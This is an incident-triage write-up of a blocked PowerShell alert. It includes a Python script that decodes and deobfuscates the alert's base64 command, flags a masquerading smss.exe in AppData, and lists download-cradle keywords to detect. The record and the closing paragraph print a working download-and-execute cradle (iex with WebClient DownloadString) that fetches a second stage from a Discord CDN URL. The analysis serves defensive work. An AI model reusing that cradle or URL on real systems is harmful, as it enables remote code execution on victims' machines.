Protection item: Execution of a suspicious script via PowerShell
Executed file: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Executed command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB2ADEAPQAiAE4AZQB0AC4AIgA7ACQAdgAyAD0AIgBXAGUAYgBDAGwAaQBlAG4AdAAiADsAaQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHYAMQAkAHYAMgApAC4AIgBEAG8AdwBuAGAAbABgAG8AYQBkAFMAdAByAGkAbgBnACIAKAAiAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADgAOAAwADIANgA1ADcAOQA2ADcANgA3ADYAMAA4ADgAOQAyAC8AOAA4ADYANAAwADEAMAAxADgAMwAxADEANgAyADYANwA4ADIALwBOAGUAdwBfAFQAZQB4AHQAXwBEAG8AYwB1AG0AZQBuAHQALgB0AHgAdAAiACkA
Result: Blocked
Process ID: 11668
Acting process: C:\Users\Zhang\AppData\Local\smss.exe
Acting process command line: "C:\Users\Zhang\AppData\Local\smss.exe"
Parent process ID: 7432
Parent process: C:\Windows\Explorer.EXE
Parent process command line: C:\Windows\Explorer.EXE
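The record above is only useful once the `-enc` payload is read back out: PowerShell's `-EncodedCommand` argument is base64 over the UTF-16LE text of the script, and this sample adds two cheap obfuscations on top (a method name split with backticks, `Down`l`oadString`, and the type name `Net.WebClient` assembled from two string variables). The following triage script is an added example written for this page; it is not the security product's own detection logic and not code from the original post. It embeds a constructed copy of the record, decodes and deobfuscates the payload, and pulls out the indicators a responder would act on (a binary named `smss.exe` running from `%LOCALAPPDATA%` with Explorer as its parent, the encoded launch, the download cradle and the Discord CDN URL). The field names, the list of System32-only binaries and the cradle keyword list are the example's own assumptions.

```python
import base64
import re

# Constructed copy of the alert record from this page (the blocked PowerShell launch),
# embedded so the script runs offline. Field names are the English ones used above.
ALERT_RECORD = r'''
Protection item: Execution of a suspicious script via PowerShell
Executed file: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Executed command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB2ADEAPQAiAE4AZQB0AC4AIgA7ACQAdgAyAD0AIgBXAGUAYgBDAGwAaQBlAG4AdAAiADsAaQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHYAMQAkAHYAMgApAC4AIgBEAG8AdwBuAGAAbABgAG8AYQBkAFMAdAByAGkAbgBnACIAKAAiAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADgAOAAwADIANgA1ADcAOQA2ADcANgA3ADYAMAA4ADgAOQAyAC8AOAA4ADYANAAwADEAMAAxADgAMwAxADEANgAyADYANwA4ADIALwBOAGUAdwBfAFQAZQB4AHQAXwBEAG8AYwB1AG0AZQBuAHQALgB0AHgAdAAiACkA
Result: Blocked
Process ID: 11668
Acting process: C:\Users\Zhang\AppData\Local\smss.exe
Acting process command line: "C:\Users\Zhang\AppData\Local\smss.exe"
Parent process ID: 7432
Parent process: C:\Windows\Explorer.EXE
Parent process command line: C:\Windows\Explorer.EXE
'''

# Core Windows binaries that only ever run from System32 (started by the kernel or by
# wininit/services, never from a user profile with Explorer as parent). Assumed list.
SYSTEM32_ONLY = {"smss.exe", "csrss.exe", "wininit.exe", "services.exe", "lsass.exe", "winlogon.exe"}
# Any prefix of -EncodedCommand that PowerShell accepts, followed by the base64 blob.
ENC_ARG = re.compile(r'-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)
# Download-and-execute primitives worth flagging in a decoded script. Assumed list.
CRADLE = re.compile(r'WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|\biex\b|\biwr\b', re.IGNORECASE)


def parse_alert(text):
    """Turn a 'Key: value' record into a dict. Only the first colon splits key from
    value, so Windows paths in the value keep their drive-letter colon."""
    fields = {}
    for line in text.strip().splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def decode_encoded_command(cmdline):
    """Return the script behind -enc (base64 of the UTF-16LE script text), or None
    when the command line carries no valid encoded payload."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped base64 padding
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def deobfuscate(script):
    """Undo the two cheap tricks in this sample: backticks splitting a quoted method
    name ("Down`l`oadString") and a type name built from string variables ($v1$v2).
    Only simple $name="literal" assignments are inlined; this is a triage heuristic,
    not a PowerShell interpreter."""
    # A backtick before anything other than a real escape (`n, `t, `0, ...) is a no-op.
    script = re.sub(r'`([^ntr0abfveu`"$])', r'\1', script)
    consts = {}

    def grab(m):
        consts[m.group(1)] = m.group(2)
        return ""  # drop the assignment statement itself

    script = re.sub(r'\$(\w+)\s*=\s*"([^"$`]*)"\s*;?', grab, script)
    for name in sorted(consts, key=len, reverse=True):  # longest names first
        script = script.replace("$" + name, consts[name])
    return script.strip()


def triage(record):
    """Pull the indicators a responder wants from the record.
    Returns (findings, deobfuscated script or None, fetched URL or None)."""
    findings = []
    actor = record.get("Acting process", "")
    actor_name = actor.rsplit("\\", 1)[-1].lower()
    if actor_name in SYSTEM32_ONLY and not actor.lower().startswith("c:\\windows\\system32\\"):
        findings.append(f"masquerading: {actor_name} running from {actor}")
    if "\\appdata\\" in actor.lower() and record.get("Parent process", "").lower().endswith("\\explorer.exe"):
        findings.append("binary in the user profile started from Explorer (user opened a dropped file)")
    script = decode_encoded_command(record.get("Executed command line", ""))
    if script is None:
        return findings, None, None
    findings.append("powershell launched with an encoded (-enc) command")
    if "`" in script or re.search(r'\$\w+\$\w+', script):
        findings.append("string obfuscation: backtick splitting / variable concatenation")
    clean = deobfuscate(script)
    cradle_hits = sorted({m.group(0) for m in CRADLE.finditer(clean)})
    if cradle_hits:
        findings.append("download-and-execute cradle: " + ", ".join(cradle_hits))
    url_match = re.search(r'https?://[^\s"\')]+', clean)
    url = url_match.group(0) if url_match else None
    if url and "discordapp.com/attachments/" in url:
        findings.append("second stage hosted on Discord's CDN: " + url)
    return findings, clean, url


if __name__ == "__main__":
    findings, clean, url = triage(parse_alert(ALERT_RECORD))
    print("decoded + deobfuscated:", clean)
    for f in findings:
        print(" -", f)
```

Run as-is, the script shows the blocked command reduced to `iex (New-Object Net.WebClient)."DownloadString"("https://cdn.discordapp.com/attachments/880265796767608892/886401018311626782/New_Text_Document.txt")`: a classic download cradle that fetches a second-stage script from Discord's CDN and runs it in memory. Combined with the launcher, a file called `smss.exe` sitting in `C:\Users\Zhang\AppData\Local` and started from Explorer (the real Session Manager lives in System32 and is created by the kernel, never with Explorer as parent), the block is the right outcome; the next steps are to collect that file, check what else it wrote to the profile and any persistence it set up, and treat the URL as an indicator to search for elsewhere.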